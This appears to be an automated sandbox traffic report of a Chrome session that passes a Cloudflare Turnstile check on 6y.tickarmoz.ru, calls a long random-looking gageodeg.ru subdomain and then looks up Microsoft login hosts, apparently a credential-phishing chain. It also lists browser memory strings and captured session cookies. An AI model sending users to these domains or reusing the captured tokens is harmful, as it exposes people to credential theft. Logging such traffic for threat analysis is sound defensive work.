Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/3m5i4/0x4AAAAAAA2KDshloYH759ec/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://6y.tickarmoz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90211ce78d29726b&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/3m5i4/0x4AAAAAAA2KDshloYH759ec/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/3m5i4/0x4AAAAAAA2KDshloYH759ec/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 6y.tickarmoz.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://6y.tickarmoz.ru/aY57/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik5wUDFDYlhHdFNTR1VUbkN2ekhSanc9PSIsInZhbHVlIjoiRzlVYS9uQitTVjEyYlpHS09DbDJRc3BwSVB6anQrbis5bVlSVk9aYXQ1b290VTUvM2JrWlJlaHdKYWNzWDQ1QUgzOUhsbzJnbE1RVWp2V3ZnQ1crdXVxSGFVSW02NGtpSkdzVW4yc2d5VE03d0RpNmIwZUp0K2FTMFhiVVVHSk4iLCJtYWMiOiJlYzg0YTFiZWM0ZmU3N2MzMTE3MjkwNzcwNzc3YjJlZTg2Y2NkNGE4MjU5OGNiMjNiNzc2NTYwOTMyYTA5ODA3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImczM0tNOEhhTFFPNk03RXVyU0ZXNXc9PSIsInZhbHVlIjoiVnhRUzkvY3k5bnBuV21rdm1ocmZTaXV6Z2ZEVkt6VTMwNTdLYXA5NGlWVzdFQ1hMOFJSWGs0T0pwazVqbjc5ZzYvZVJiaUt6ZW1HRk5sdERCbjc3c1JTK3VLbGFodjJ1cTZhOUFhQlB0SUtwT3AwSzFTaDA2L3JSQzcwc0pqejUiLCJtYWMiOiI2ODZlMGE3Y2Q2M2I1MjA5ZTkyNjQ0MmEwNzc2YWE1MDYyZDViMDNjZDUyZjY3NTg1MTg0ODRkYWMzYmVjMTAxIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90211ce78d29726b&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1505571972:1736892714:9ZzSSdQkrASfPzbc2F-di7JK8klPv-kLQYqOPftQ7_o/90211ce78d29726b/l2D8zMoXa112OUBHqOGd5MV.i80dS5C.AQyPKeXZh0o-1736894270-1.1.1.1-Zg623OGWeh.XscTSOHcwhUPwmQJPRgVW7Cm6FtO8BTyNk8EmFH1CI7QxhAT0d9n7 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/90211ce78d29726b/1736894272348/101bfdbf082dd482f8356507d292f211b10f12d96672741a8dbd41f11a4bd0ba/p0aOx1kBZtBR-nk HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/3m5i4/0x4AAAAAAA2KDshloYH759ec/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/90211ce78d29726b/1736894272349/Y6BOUtUVqa43Gyq HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/3m5i4/0x4AAAAAAA2KDshloYH759ec/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/90211ce78d29726b/1736894272349/Y6BOUtUVqa43Gyq HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1505571972:1736892714:9ZzSSdQkrASfPzbc2F-di7JK8klPv-kLQYqOPftQ7_o/90211ce78d29726b/l2D8zMoXa112OUBHqOGd5MV.i80dS5C.AQyPKeXZh0o-1736894270-1.1.1.1-Zg623OGWeh.XscTSOHcwhUPwmQJPRgVW7Cm6FtO8BTyNk8EmFH1CI7QxhAT0d9n7 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /90905003549781675088blDRrUHCFAKJQYHDPRFMEQWIYWIINXLMHIYWOKDVPQHKLW HTTP/1.1Host: x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://6y.tickarmoz.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://6y.tickarmoz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1505571972:1736892714:9ZzSSdQkrASfPzbc2F-di7JK8klPv-kLQYqOPftQ7_o/90211ce78d29726b/l2D8zMoXa112OUBHqOGd5MV.i80dS5C.AQyPKeXZh0o-1736894270-1.1.1.1-Zg623OGWeh.XscTSOHcwhUPwmQJPRgVW7Cm6FtO8BTyNk8EmFH1CI7QxhAT0d9n7 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /90905003549781675088blDRrUHCFAKJQYHDPRFMEQWIYWIINXLMHIYWOKDVPQHKLW HTTP/1.1Host: x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apc/trans.gif?5508e97fb6ed28869810ca65ad75bc31 HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: afed493c575e33914867d9dfa75363d0.azr.footprintdns.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /apc/trans.gif?6a7b1480308df71e1e1813109fa99c95 HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: afed493c575e33914867d9dfa75363d0.azr.footprintdns.comConnection: Keep-Alive
Source: chrome.exe, 00000000.00000002.2448086785.000018A80078D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2432295544.000018A8000CC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: /www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2432295544.000018A8000CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2448086785.000018A80078D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2432295544.000018A8000CC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ht/www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2474452106.000018A801ADC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2448086785.000018A80078D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2474760399.000018A801B1C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2445223137.000018A800678000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2474760399.000018A801B1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcaogl equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2448086785.000018A80078D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2474823543.000018A801B2C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2436911541.000018A8002D0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2462302280.000018A800CB8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2436911541.000018A8002D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlbag equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2474823543.000018A801B2C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: 6y.tickarmoz.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1505571972:1736892714:9ZzSSdQkrASfPzbc2F-di7JK8klPv-kLQYqOPftQ7_o/90211ce78d29726b/l2D8zMoXa112OUBHqOGd5MV.i80dS5C.AQyPKeXZh0o-1736894270-1.1.1.1-Zg623OGWeh.XscTSOHcwhUPwmQJPRgVW7Cm6FtO8BTyNk8EmFH1CI7QxhAT0d9n7 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3184sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: l2D8zMoXa112OUBHqOGd5MV.i80dS5C.AQyPKeXZh0o-1736894270-1.1.1.1-Zg623OGWeh.XscTSOHcwhUPwmQJPRgVW7Cm6FtO8BTyNk8EmFH1CI7QxhAT0d9n7sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/3m5i4/0x4AAAAAAA2KDshloYH759ec/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 22:37:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r1xFHWiy9RDbNdDm%2B6ppedYyYm0155nF1S%2F9Nc1kCjcncOXICpU484wOgnf8a7UD8IFVYy7dg98sE8yyFoQJe3wYahBWkX7yQ4wMTONU260DJiwAikdXS5v0EqxrFA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1370&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2252&delivery_rate=2078832&cwnd=251&unsent_bytes=0&cid=ec9f68e0e41c876f&ts=223&x=0"CF-Cache-Status: HITAge: 13585Server: cloudflareCF-RAY: 90211cedffc76e06-YULserver-timing: cfL4;desc="?proto=TCP&rtt=17662&min_rtt=17646&rtt_var=6650&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1892&delivery_rate=164257&cwnd=32&unsent_bytes=0&cid=741cc4fb7bb1f89a&ts=4113&x=0"
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000000.00000002.2449214207.000018A80080C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2444217413.000018A80062C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517C
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078S
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205W
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2430477894.000018A80000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452K
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502U
Source: chrome.exe, 00000000.00000002.2430477894.000018A80000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584A
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2444217413.000018A80062C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586D
Source: chrome.exe, 00000000.00000002.2467583111.000018A800F70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 00000000.00000002.2467583111.000018A800F70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
Source: chrome.exe, 00000000.00000002.2467583111.000018A800F70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2447559603.000018A800758000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439878582.000018A800480000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/44055
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 00000000.00000002.2449214207.000018A80080C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439878582.000018A800480000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901b
Source: chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937Z
Source: chrome.exe, 00000000.00000002.2448579620.000018A8007C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
Source: chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
Source: chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375G
Source: chrome.exe, 00000000.00000002.2439878582.000018A800480000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535.
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658an
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750an/
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881c
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2438455884.000018A8003E8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2444217413.000018A80062C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
